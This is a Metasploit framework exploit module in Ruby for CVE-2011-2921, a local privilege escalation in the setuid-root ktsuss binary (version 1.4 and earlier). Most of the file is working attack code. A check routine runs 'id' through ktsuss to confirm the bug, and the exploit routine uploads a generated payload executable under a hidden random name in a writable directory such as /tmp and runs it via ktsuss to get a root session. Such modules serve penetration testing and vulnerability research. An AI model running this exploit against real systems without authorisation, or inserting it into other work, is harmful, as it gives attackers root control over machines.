Path: blob/master/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb
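##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege escalation through the setuid-root ktsuss binary
# (CVE-2011-2921): ktsuss does not drop privileges before running the
# user-supplied command, so whatever it is asked to execute runs as root.
#
# AutoCheck is prepended so the framework runs #check before #exploit
# (the usual AutoCheck semantics); FileDropper removes the uploaded
# payload when the session closes.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata plus the two datastore options the module reads:
  # KTSUSS_PATH (location of the setuid binary) and the advanced
  # WritableDir (where the payload executable is staged).
  #
  # @param info [Hash] module info supplied by the framework
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ktsuss suid Privilege Escalation',
        'Description' => %q{
          This module attempts to gain root privileges by exploiting
          a vulnerability in ktsuss versions 1.4 and prior.

          The ktsuss executable is setuid root and does not drop
          privileges prior to executing user specified commands,
          resulting in command execution with root privileges.

          This module has been tested successfully on:

          ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and
          ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'John Lightsey', # Discovery and exploit
          'bcoles' # Metasploit
        ],
        'DisclosureDate' => '2011-08-13',
        'References' => [
          ['CVE', '2011-2921'],
          ['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'],
          ['URL', 'https://security.gentoo.org/glsa/201201-15'],
          ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh']
        ],
        'Platform' => ['linux'],
        'Arch' => [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
        'SessionTypes' => ['shell', 'meterpreter'],
        'Targets' => [['Auto', {}]],
        # The generated executable forks and sets its uid/gid before the
        # payload proper runs, and exits cleanly afterwards (AppendExit).
        'DefaultOptions' => {
          'AppendExit' => true,
          'PrependSetresuid' => true,
          'PrependSetresgid' => true,
          'PrependSetreuid' => true,
          'PrependSetuid' => true,
          'PrependFork' => true
        },
        'Notes' => {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_SAFE ]
        },
        'DefaultTarget' => 0
      )
    )
    register_options [
      # Fixed: the description previously said "staprun" (copy-paste from
      # another module); this option points at the ktsuss binary.
      OptString.new('KTSUSS_PATH', [true, 'Path to ktsuss executable', '/usr/bin/ktsuss'])
    ]
    register_advanced_options [
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  # @return [String] the KTSUSS_PATH datastore value
  def ktsuss_path
    datastore['KTSUSS_PATH']
  end

  # @return [String] the WritableDir datastore value, coerced to a String
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Writes +data+ to +path+ on the target, replacing any existing file,
  # and registers the path so FileDropper deletes it on cleanup.
  #
  # @param path [String] remote path to write
  # @param data [String] file contents
  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  # Uploads +data+ to +path+ and marks it executable.
  #
  # @param path [String] remote path to write
  # @param data [String] file contents
  def upload_and_chmodx(path, data)
    upload path, data
    chmod path
  end

  # Active check: after confirming the binary exists and is setuid, it
  # runs `id` through ktsuss as the session's own user and reports
  # Vulnerable only when the output contains "uid=0". Because it really
  # executes a command via the setuid binary, the check is visible to
  # process auditing on the target, unlike a passive version check.
  #
  # NOTE(review): any failure to run the command (empty output, ktsuss
  # unable to start in this session) is also reported as Safe; returning
  # CheckCode::Unknown for an empty +res+ may be more accurate - confirm
  # how AutoCheck should treat that case before changing it.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    return CheckCode::Safe("#{ktsuss_path} file not found") unless file? ktsuss_path
    return CheckCode::Safe("#{ktsuss_path} is not setuid") unless setuid? ktsuss_path

    vprint_good "#{ktsuss_path} is setuid"

    # -u is presumably ktsuss's "run as user" switch; the module passes the
    # session's own username, so a privilege-dropping ktsuss would print a
    # non-root uid here.
    id = cmd_exec 'whoami'
    res = cmd_exec("#{ktsuss_path} -u #{id} id").to_s
    vprint_status res

    unless res.include? 'uid=0'
      return CheckCode::Safe
    end

    CheckCode::Vulnerable
  end

  # Stages the generated payload executable under WritableDir with a
  # random dot-prefixed name and executes it through ktsuss.
  #
  # Aborts with BadConfig when the session is already root (unless
  # ForceExploit is set) or when WritableDir is not writable.
  #
  # @raise [Msf::Exploit::Failed] via fail_with on the BadConfig paths
  def exploit
    if !datastore['ForceExploit'] && is_root?
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
    end

    unless writable? base_dir
      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
    end

    payload_name = ".#{rand_text_alphanumeric 10..15}"
    payload_path = "#{base_dir}/#{payload_name}"
    upload_and_chmodx payload_path, generate_payload_exe

    print_status 'Executing payload ...'
    id = cmd_exec 'whoami'
    # The trailing "& echo " presumably backgrounds the payload so cmd_exec
    # returns promptly instead of blocking on the new process - confirm.
    res = cmd_exec "#{ktsuss_path} -u #{id} #{payload_path} & echo "
    vprint_line res
  end
end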